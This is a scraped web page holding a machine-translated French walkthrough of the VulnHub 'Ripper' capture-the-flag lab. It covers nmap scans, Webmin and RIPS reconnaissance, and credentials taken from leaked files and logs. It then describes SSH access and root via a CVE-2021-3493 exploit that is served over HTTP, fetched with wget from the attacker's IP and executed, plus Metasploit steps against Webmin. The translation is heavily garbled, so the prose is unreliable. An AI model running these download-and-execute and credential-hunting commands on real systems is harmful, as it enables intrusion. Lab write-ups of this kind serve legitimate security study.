当前位置:网站首页>Ripper of vulnhub
Ripper of vulnhub
2022-07-03 11:47:00 【May... Fleurs Vii.】
Table des matières
2.、Sonde de version de service
Quatre、Fuite d'information du système interne
1.Télécharger l'exécution de la compilation
Sept、 Droit de revendication normal
2. TrouvercubesDocuments connexes
Un.、nmapScan Survival Host
1.Scan semi - ouvert
nmap -sS ip
2.Balayage ouvert complet
nmap -sT ip
3.Basé surpingScan de
nmap -sP ip
4.Basé surarpScan de
nmap -PR ip
5.AucunepingScan
nmap -PN 192.168.152.130
2.、Sonde de version de service
22,80 Ou deux services communs ,10000Le port est ouvert.webmin
Webmin Est la base la plus puissante WebDeUnixOutils de gestion du système. Accès de l'Administrateur via le Navigateur Webmin Diverses fonctions de gestion et mesures de gestion correspondantes .WebminSoutenir la grande majorité desUnixSystème, Ces systèmes, à l'exception de toutes les versions linuxEn plus de:AIX、HPUX、Solaris、Unixware、IrixEtFreeBSDAttendez..
Trois、Collecte d'informations
80 Le port n'a aucune information utile pour franchir la frontière.
Mais dans10000 On en a trouvé un. webminBoîte de connexion pour
1.webminBoîte de connexion pour
2.robots.txtDocumentation
3.Essayer de déchiffrer
we scan php codes with rips
4.rips
RIPS Est un bon outil d'analyse de code source statique , Utilisé principalement pour creuser PHP Vulnérabilité du programme . Et c'est un webInterface,Accès àripsCommencez à utiliser. Essayer d'accéder .
En fin de compte,80 On a vu ça sous le port. rips
Quatre、Fuite d'information du système interne
Cinq、sshConnexion
Essayez de vous connecter ici webmin Pas en coulisses. .Essayer d'utilisersshConnexion réussie,
Six、0dayDroit de rétractation
Parce qu'après le lancement de cette cible, ,unbuntu Il y a une faille dans les droits. .Pour que nous puissions utiliser directement.
Numéro de vulnérabilité:cve-2021-3493
1.Télécharger l'exécution de la compilation
L'hôte cible n'a pas d'environnement de compilation ,Précompilé
gcc exploit.c -o exp
OuverthttpServices
python3 -m http.server 80
Télécharger
wget http://192.168.0.106/exp
Droit de donner
chmod 777 exp
Mise en œuvre
./exp
Sept、 Droit de revendication normal
1. firefox
J'ai vu un autre navigateur Firefox. , Ça ne sert à rien. .
2. TrouvercubesDocuments connexes
find / -user cubes -type f -exec ls -al {} \; 2>/dev/null
Cet ordre{} Est utilisé pour recevoir les résultats
C'est pour s'échapper. ;De
Après une recherche, J'ai un code. ,Je suppose quecubesDe
3.suOui.cubes
4.findRecherche
Recherche etcubesQuestions connexes, Et filtrer ce qui est inutile
find / -user cubes -type f -exec ls -al {} \; 2>/dev/null |grep -v "proc"
Nous l'avons trouvé dans le fichier journal adminNuméro de compte, mot de passe
5.ConnexionwebminBackground
Parce qu'on a le numéro de compte de l'Administrateur. ,Encore parce quewebminC'est le contrôle.linuxTerminalweb‘Application’, Donc vous avez les permissions les plus élevées depuis que vous vous êtes connecté .
Huit、msf
Je suis juste venu me familiariser avec l'utilisation. ,Parce quemsfDerce Le module nécessite également un mot de passe de compte , Mais avec le compte et le mot de passe, nous pouvons obtenir l'autorisation de l'Administrateur directement.
msfconsole
search webmin
use 2
show options
Définir les paramètres
C'est là que ça doit être réglé.
set ssl true
边栏推荐
- typeScript
- 抓包整理外篇fiddler———— 会话栏与过滤器[二]
- Oracle withdraw permission & create role
- C language utf8toutf16 (UTF-8 characters are converted to hexadecimal encoding)
- vulnhub之narak
- 2022 northeast four provinces match VP record / supplementary questions
- ASP. Net hotel management system
- After setting up ADG, instance 2 cannot start ora-29760: instance_ number parameter not specified
- [OBS] configFile in ini format of OBS
- uniapp scroll view 解决高度自适应、弹框滚动穿透等问题。
猜你喜欢
用了这么久线程池,你真的知道如何合理配置线程数吗?
rxjs Observable filter Operator 的实现原理介绍
vulnhub之narak
C语言 AES加解密
基于turtlebot3实现SLAM建图及自主导航仿真
Cuiyusong, CTO of youzan: the core goal of Jarvis is to make products smarter and more reliable
小鹏 P7 撞护栏安全气囊未弹出,官方回应称撞击力度未达到弹出要求
同事写了一个责任链模式,bug无数...
FL Studio 20无限试用版水果编曲下载
The tutor put forward 20 pieces of advice to help graduate students successfully complete their studies: first, don't plan to take a vacation
随机推荐
解决msvcp120d.dll和msvcr120d.dll缺失
vulnhub之momentum
.\vmware-vdiskmanager.exe -k “c:\\xxxxx.vmdk”
Understand go language context in one article
Internet socket (non) blocking write/read n bytes
uniapp实现点击加载更多
(数据库提权——Redis)Redis未授权访问漏洞总结
Nestjs configuration service, configuring cookies and sessions
STL教程9-容器元素深拷贝和浅拷贝问题
Groovy测试类 和 Junit测试
Event preview | the live broadcast industry "rolled in" to drive new data growth points with product power
Arctangent entropy: the latest SCI paper in July 2022
Go语言实现静态服务器
AOSP ~ NTP ( 网络时间协议 )
Numpy np. Max and np Maximum implements the relu function
DS90UB949
R语言使用aggregate函数计算dataframe数据分组聚合的均值(sum)、不设置na.rm计算的结果、如果分组中包含缺失值NA则计算结果也为NA
2022年湖南工学院ACM集训第二次周测题解
R语言使用gridExtra包的grid.arrange函数将lattice包的多个可视化图像横向组合起来,ncol参数自定义组合图列数、nrow参数自定义组合图行数
金额计算用 BigDecimal 就万无一失了?看看这五个坑吧~~